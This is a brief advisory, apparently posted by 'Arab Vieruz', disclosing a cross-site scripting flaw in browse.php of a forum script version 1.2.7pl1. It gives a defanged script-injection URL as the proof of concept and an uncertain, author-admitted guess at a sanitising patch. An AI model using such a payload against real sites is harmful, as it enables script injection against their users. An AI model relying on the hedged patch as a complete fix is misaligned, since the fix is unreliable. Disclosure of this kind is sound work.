Vulnerable systems:
1.2.7pl1
Exploit:
forums/browse.php?fid=3&tid=46&go=<scri*pt>JavaScript:alert
('Hi');</scri*pt>
(with out "*")
Solution:
i thought this but i am not sure
open browse.php and add this code in line 52:
$go = HTMLSpecialChars($go);
$go = PREG_Replace("/[A-Z&.;:()~!@#$%^''*\{\}\/]/i", "", $go);
----------------------------------
Arab Vieruz
thanx
